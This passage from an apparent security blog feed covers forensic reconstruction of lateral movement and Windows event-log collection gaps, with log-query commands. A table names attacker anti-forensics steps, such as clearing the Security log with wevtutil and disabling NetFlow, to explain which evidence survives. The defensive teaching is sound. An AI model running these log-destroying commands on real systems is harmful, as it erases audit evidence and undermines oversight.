16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Quick IP lookup against DHCP logs (command-line usage)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">python3 dhcp_correlator</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">py \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token 
operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">dhcp</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">dir</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">path</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">to</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">dhcp</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">/</span><span class=\"token plain\">logs \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">ip </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">10.10</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">.5</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">.42</span><span class=\"token plain\"> \\</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\">time </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"2025-11-15 02:47:33\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 
<span class=\"token plain\"></span><span class=\"token comment\"">
16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Output: 10.10.5.42 at 2025-11-15 02:47:33 was LAPTOP-JSMITH (MAC: 00:1A:2B:...)</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-artifacts-that-survive-attacker-cleanup\">Part 8 - The Artifacts That Survive Attacker Cleanup<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-8--the-artifacts-that-survive-attacker-cleanup\" class=\"hash-link\" aria-label=\"Direct link to Part 8 - The Artifacts That Survive Attacker Cleanup\" title=\"Direct link to Part 8 - The Artifacts That Survive Attacker Cleanup\" translate=\"no\">​</a></h2>\n<p>Sophisticated attackers attempt to remove evidence. Understanding what survives cleanup determines whether your investigation can proceed after the attacker has tried to cover tracks.</p>\n<table><thead><tr><th>Attacker Action</th><th>What Is Destroyed</th><th>What Survives</th></tr></thead><tbody><tr><td><code>ipconfig /flushdns</code> on source</td><td>Local DNS cache</td><td>DNS server query logs, DHCP records, NetFlow</td></tr><tr><td><code>wevtutil cl Security</code> on target</td><td>Target's Security event log</td><td>DC's 4769 records showing service ticket to target, NetFlow showing the connection</td></tr><tr><td>Delete DHCP log files</td><td>DHCP daily logs</td><td>Active lease database (<code>dhcp.mdb</code>), SIEM if logs were ingested</td></tr><tr><td>Spoof MAC address</td><td>Correct MAC in DHCP logs</td><td>Anomalous MAC not in asset inventory, IP conflict events (DHCP ID 24)</td></tr><tr><td>VPN / proxy through another internal host</td><td>Direct source IP in NetFlow</td><td>Intermediate host shows elevated connection count, DHCP shows presence of intermediate</td></tr><tr><td>Disable NetFlow on switch</td><td>Future NetFlow data</td><td>Historical NetFlow from 
before disable event</td></tr><tr><td>Rename computer before lateral move</td><td>Hostname in DNS</td><td>MAC address correlation still possible, old DNS PTR records</td></tr></tbody></table>\n<p><strong>The most resilient artifact: NetFlow from core switch</strong></p>\n<p>The attacker would need administrative access to your core switching infrastructure to retroactively destroy NetFlow. In most organizations, this is a separate administrative domain from Windows servers. Even if the attacker cleans every Windows log, the flow records showing the connections remain on the collector.</p>\n<p><strong>The second most resilient: DNS server query logs (if enabled)</strong></p>\n<p>The attacker cleaning logs on workstations and servers does not affect DNS query logs on the DNS server. These are particularly valuable because they capture <strong>every hostname the attacker resolved</strong>, including reconnaissance against hosts they never successfully connected to.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"summary-the-correlation-matrix\">Summary: The Correlation Matrix<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#summary-the-correlation-matrix\" class=\"hash-link\" aria-label=\"Direct link to Summary: The Correlation Matrix\" title=\"Direct link to Summary: The Correlation Matrix\" translate=\"no\">​</a></h2>\n<p>When you have an IR scenario and need to know which sources answer which questions, use this reference:</p>\n<table><thead><tr><th>Question</th><th>Primary Source</th><th>Secondary Source</th><th>Command</th></tr></thead><tbody><tr><td>What hosts did X talk to?</td><td>NetFlow</td><td>DNS cache</td><td><code>nfdump \"src ip X and dst net internal\"</code></td></tr><tr><td>What hostname owned IP Y at time T?</td><td>DHCP logs</td><td>DNS PTR records</td><td><code>resolve_ip(Y, T)</code> from dhcp_correlator.py</td></tr><tr><td>What account was used for 
connection?</td><td>DC Security 4624/4769</td><td>Target 4624</td><td><code>Get-WinEvent ... Id 4624 -FilterXPath</code></td></tr><tr><td>Was pass-the-hash used?</td><td>DC/Target 4624 KeyLength=0</td><td>NetFlow NTLM port pattern</td><td>KeyLength field in 4624 XML</td></tr><tr><td>When did attacker first appear?</td><td>DHCP first Assign event</td><td>NetFlow earliest record</td><td><code>nfdump earliest</code> + DHCP first seen</td></tr><tr><td>Which hosts were scanned but not compromised?</td><td>NetFlow SYN-only flows</td><td>DNS cache of source</td><td>TCP flags analysis in nfdump</td></tr><tr><td>What data was staged/exfiltrated?</td><td>NetFlow bytes, off-hours large transfers</td><td>DNS cache for staging host</td><td><code>nfdump \"dst net internal and byt &gt; 100MB\"</code></td></tr><tr><td>Did the attacker modify logs?</td><td>Event 1102, 4719 on DCs</td><td>SIEM volume anomaly</td><td><code>Get-WinEvent ... Id 1102, 4719</code></td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Docs: DHCP Server Log Event IDs - complete event ID reference</li>\n<li class=\"\">nfdump documentation: nfdump.sourceforge.io - complete query syntax</li>\n<li class=\"\">NSA: \"Detect and Prevent Web Shell Malware\" - NetFlow analysis methodology</li>\n<li class=\"\">SANS: \"Network Forensics Analysis\" course materials - flow analysis techniques</li>\n<li class=\"\">MITRE ATT&amp;CK T1021.002 (SMB/Windows Admin Shares) - lateral movement documentation</li>\n<li class=\"\">MITRE ATT&amp;CK T1550.002 (Pass the Hash) - detection guidance</li>\n<li class=\"\">Cisco: NetFlow Configuration Guide - enabling NetFlow on Cisco 
infrastructure</li>\n<li class=\"\">Microsoft Security: \"Token Theft Playbook\" - auth log correlation methodology</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a> - fix the event collection gaps that force you into DNS and NetFlow reconstruction</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a> - the full attacker timeline this forensics methodology is designed to reconstruct</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a> - cloud-layer lateral movement that doesn't show up in on-prem NetFlow</li>\n</ul>\n<hr>\n<p><em>All commands and techniques described in this post are standard incident response and forensic analysis procedures. They operate against infrastructure and logs that the analyst has administrative access to as part of an authorized investigation.</em></p>",
            "url": "https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs",
            "title": "Network Forensics Without a Tap: Reconstructing Lateral Movement from DNS Cache, NetFlow, and Authentication Logs",
            "summary": "How to reconstruct lateral movement using DNS cache, DHCP logs, NetFlow, and Windows auth logs when you have no packet capture.",
            "date_modified": "2026-04-19T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "network-forensics",
                "incident-response",
                "lateral-movement",
                "detection-engineering",
                "netflow",
                "dns-forensics"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events",
            "content_html": "<blockquote>\n<p>An analyst flags a suspicious lateral movement alert. You pull the investigation timeline. There is a 47-minute gap in process creation events from a critical server  right across the window where the attacker moved. The EDR shows nothing. The SIEM shows nothing. Post-incident forensics on the local machine reveals 6,800 events that never left the endpoint. The Security event log overwrote itself. The WEF subscription had a filter bug. The WEC server was under load. Nobody noticed because nobody measured. This scenario is not hypothetical  it is the most common root cause of detection gaps found during post-incident reviews, and it is almost entirely preventable.</p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-this-matters-more-than-any-detection-rule-youll-write\">Why This Matters More Than Any Detection Rule You'll Write<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#why-this-matters-more-than-any-detection-rule-youll-write\" class=\"hash-link\" aria-label=\"Direct link to Why This Matters More Than Any Detection Rule You'll Write\" title=\"Direct link to Why This Matters More Than Any Detection Rule You'll Write\" translate=\"no\">​</a></h2>\n<p>Security teams invest enormous effort writing detection rules, tuning Sigma, and expanding MITRE ATT&amp;CK coverage. Those efforts are worthless if the underlying events never reach your SIEM.</p>\n<p>The assumption baked into virtually every SIEM dashboard is that the event collection pipeline is working. That assumption is almost never tested, and when it fails, it fails silently. There is no alert for \"we stopped receiving process creation events from this host.\" There is no dashboard tile that turns red when your WEC server starts dropping events under load. 
There is no automatic notification when a GPO conflict silently rolls back your advanced audit policy to defaults.</p>\n<p>The result is what security engineers sometimes call coverage theater: you have the rules, you have the dashboards, you have the ATT&amp;CK heatmap lit up, but underneath it all is a collection infrastructure with real gaps through which an attacker who understands Windows internals can move without ever triggering an alert.</p>\n<p>This post goes from first principles (how Windows event logging actually works internally) through the specific failure modes that cause events to be lost, and ends with concrete tools and scripts you can run this week to measure your actual collection fidelity.</p>\n<hr>\n
<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-1--the-architecture-from-kernel-event-to-siem-record\">Part 1 - The Architecture: From Kernel Event to SIEM Record<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-1--the-architecture-from-kernel-event-to-siem-record\" class=\"hash-link\" aria-label=\"Direct link to Part 1 - The Architecture: From Kernel Event to SIEM Record\" title=\"Direct link to Part 1 - The Architecture: From Kernel Event to SIEM Record\" translate=\"no\">​</a></h2>\n<p>Understanding where events can be lost requires understanding the full pipeline. Most practitioners know the high-level model. Few know the internals where things actually break.</p>\n
<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"11-event-tracing-for-windows-etw-the-kernel-foundation\">1.1 Event Tracing for Windows (ETW): The Kernel Foundation<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#11-event-tracing-for-windows-etw-the-kernel-foundation\" class=\"hash-link\" aria-label=\"Direct link to 1.1 Event Tracing for Windows (ETW): The Kernel Foundation\" title=\"Direct link to 1.1 Event Tracing for Windows (ETW): The Kernel Foundation\" translate=\"no\">​</a></h3>\n<p>Every Windows event originates in Event Tracing for Windows (ETW), the low-level kernel subsystem that acts as the backbone for all Windows telemetry. ETW is not the same as the Windows Event Log. It is the underlying transport mechanism.</p>\n<!-- -->\n<p>Ten distinct failure points across four layers. An event can be lost at any one of them, with no notification to the analyst on the other end.</p>\n
<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"12-the-etw-ring-buffer--where-events-are-born-and-first-lost\">1.2 The ETW Ring Buffer: Where Events Are Born and First Lost<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#12-the-etw-ring-buffer--where-events-are-born-and-first-lost\" class=\"hash-link\" aria-label=\"Direct link to 1.2 The ETW Ring Buffer: Where Events Are Born and First Lost\" title=\"Direct link to 1.2 The ETW Ring Buffer: Where Events Are Born and First Lost\" translate=\"no\">​</a></h3>\n<p>ETW operates using in-memory ring buffers, circular memory regions that providers write events into. Consumers (including the Windows Event Log service) read from these buffers. When a buffer fills faster than consumers can drain it, new events overwrite old ones in memory before they are ever written to disk.</p>\n<p>This is not the same as log overwriting (which happens on disk). ETW ring buffer overflow is silent, in-memory loss that leaves no trace of the dropped events, not even a gap in the EventRecordID sequence.</p>\n<p>ETW buffer parameters are configurable but almost never tuned:</p>\n
<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View current ETW session configuration for a specific session</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">logman query \"EventLog-Security\" -ets</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Sample output:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Name:                 EventLog-Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Status:               Running</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Root Path:            %systemdrive%\\PerfLogs\\Admin</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Segment:              Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Schedules:            On</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token 
plain\">:: Segment Max Size:     100 MB</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Name:                 EventLog-Security</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Type:                 Trace</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Append:               Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Circular:             Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Overwrite:            Off</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffer Size:          64              ← 64KB per buffer</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffers Lost:         0               ← Watch this number</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffers Written:      15432</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Buffer Flush Timer:   1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Clock Type:           System</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: File Mode:            Real-time</span><br></span></code></pre></div></div>\n<p>The <code>Buffers Lost</code> counter is the key metric. If this is non-zero, events are being dropped in ETW before the Event Log service even sees them. 
Check this on domain controllers and high-activity servers:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Check ETW buffer loss for all active security-related sessions</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-WinEvent -ListLog Security | Select-Object LogName, RecordCount, IsEnabled</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># More detailed: check ETW session stats via Performance Counters</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$counterPaths = @(</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Security System-Wide Statistics\\Audit Failures',</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    '\\Security System-Wide Statistics\\System Events'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-Counter -Counter $counterPaths -SampleInterval 1 -MaxSamples 5</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" 
id=\"13-the-evtx-file-structure-and-how-overwrites-work\">1.3 The EVTX File: Structure and How Overwrites Work<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#13-the-evtx-file-structure-and-how-overwrites-work\" class=\"hash-link\" aria-label=\"Direct link to 1.3 The EVTX File: Structure and How Overwrites Work\" title=\"Direct link to 1.3 The EVTX File: Structure and How Overwrites Work\" translate=\"no\">​</a></h3>\n<p>Windows event logs are stored as <code>.evtx</code> (XML Event Log) files in <code>C:\\Windows\\System32\\winevt\\logs\\</code>. The format uses a chunked binary structure:</p>\n<!-- -->\n<p>When the log wraps, EventRecordIDs continue incrementing; they do not reset. This means you can detect overwrite gaps by looking for discontinuities in the EventRecordID sequence. A jump from EventRecordID 482,441 to 489,209 means 6,768 events were overwritten and are gone.</p>\n
<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Detect EventRecordID gaps that indicate log overwriting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run on a remote host or locally</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$events = Get-WinEvent -LogName Security -MaxEvents 100 |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object RecordId, TimeCreated, Id |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">for ($i = 1; $i -lt $events.Count; $i++) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $gap = $events[$i].RecordId - $events[$i-1].RecordId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($gap -gt 1) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"GAP DETECTED: RecordId jumped from $($events[$i-1].RecordId) to $($events[$i].RecordId)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  Missing events: $($gap - 1)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  Time of gap: $($events[$i-1].TimeCreated) → $($events[$i].TimeCreated)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<hr>\n
<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-2--audit-policy-the-silent-misconfiguration\">Part 2 - Audit Policy: The Silent Misconfiguration<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#part-2--audit-policy-the-silent-misconfiguration\" class=\"hash-link\" aria-label=\"Direct link to Part 2 - Audit Policy: The Silent Misconfiguration\" title=\"Direct link to Part 2 - Audit Policy: The Silent Misconfiguration\" translate=\"no\">​</a></h2>\n<p>Before a single event travels anywhere, it must first be generated. Audit policy controls what the Security Reference Monitor (the kernel component that enforces security policy) actually logs. This is where the majority of defensive coverage gaps originate: not in the collection pipeline, but in the policy that controls whether events are generated at all.</p>\n
<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"21-legacy-vs-advanced-audit-policy--the-conflict-that-silently-disables-your-logging\">2.1 Legacy vs. Advanced Audit Policy: The Conflict That Silently Disables Your Logging<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#21-legacy-vs-advanced-audit-policy--the-conflict-that-silently-disables-your-logging\" class=\"hash-link\" aria-label=\"Direct link to 2.1 Legacy vs. Advanced Audit Policy: The Conflict That Silently Disables Your Logging\" title=\"Direct link to 2.1 Legacy vs. Advanced Audit Policy: The Conflict That Silently Disables Your Logging\" translate=\"no\">​</a></h3>\n<p>Windows has two audit policy systems that can conflict:</p>\n<table><thead><tr><th>System</th><th>Location</th><th>Granularity</th><th>Subcategories</th></tr></thead><tbody><tr><td>Legacy Audit Policy</td><td>secpol.msc → Local Policies → Audit Policy</td><td>9 top-level categories</td><td>None</td></tr><tr><td>Advanced Audit Policy</td><td>secpol.msc → Advanced Audit Policy Configuration</td><td>10 categories, 58 subcategories</td><td>Full control</td></tr></tbody></table>\n<p>The critical, frequently unknown behavior: if both are configured, legacy policy wins by default and silently overrides advanced policy subcategories.</p>\n<p>Example of the conflict:</p>\n<!-- -->\n<p>The fix is a single GPO setting that most organizations are missing:</p>\n
<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">GPO Path: Computer Configuration → Windows Settings → Security Settings →</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Local Policies → Security Options</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Setting: \"Audit: Force audit policy subcategory settings (Windows Vista or later)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">     
     to override audit policy category settings\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Value: ENABLED</span><br></span></code></pre></div></div>\n<p>Without this setting enabled, any legacy audit policy in the GPO hierarchy silently defeats your advanced policy subcategories. You will see events being generated (because the legacy category is enabled), but you will lose the subcategory filtering that gives you specific, high-value event IDs.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"22-reading-your-actual-effective-audit-policy-not-what-you-configured\">2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)<a href=\"https://inferencedefense.com/academy/blog-internal/windows-event-log-architecture-siem-missing-events#22-reading-your-actual-effective-audit-policy-not-what-you-configured\" class=\"hash-link\" aria-label=\"Direct link to 2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)\" title=\"Direct link to 2.2 Reading Your Actual Effective Audit Policy (Not What You Configured)\" translate=\"no\">​</a></h3>\n<p>The GPO editor shows what you configured. <code>auditpol.exe</code> shows what is actually in effect on a given machine. 
These are often different.</p>\n<div class=\"language-cmd codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-cmd codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: View the complete effective audit policy (all 58 subcategories)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Run on a DC, critical server, or workstation you want to verify</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">auditpol /get /category:*</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Sample output (showing common gap areas):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: System audit policy</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Category/Subcategory                      Setting</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Account Logon</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Credential Validation                   No Auditing    ← PROBLEM: logons not logged</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: 
  Kerberos Authentication Service         Success        ← OK</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Kerberos Service Ticket Operations      Success        ← Missing Failure events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Other Account Logon Events              No Auditing    ← PROBLEM</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">:: Logon/Logoff</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Logon                                   Success and Failure</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Logoff                                  Success</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Account Lockout                         Success</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Special Logon                           No Auditing    ← PROBLEM: admin logons missed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">::   Other 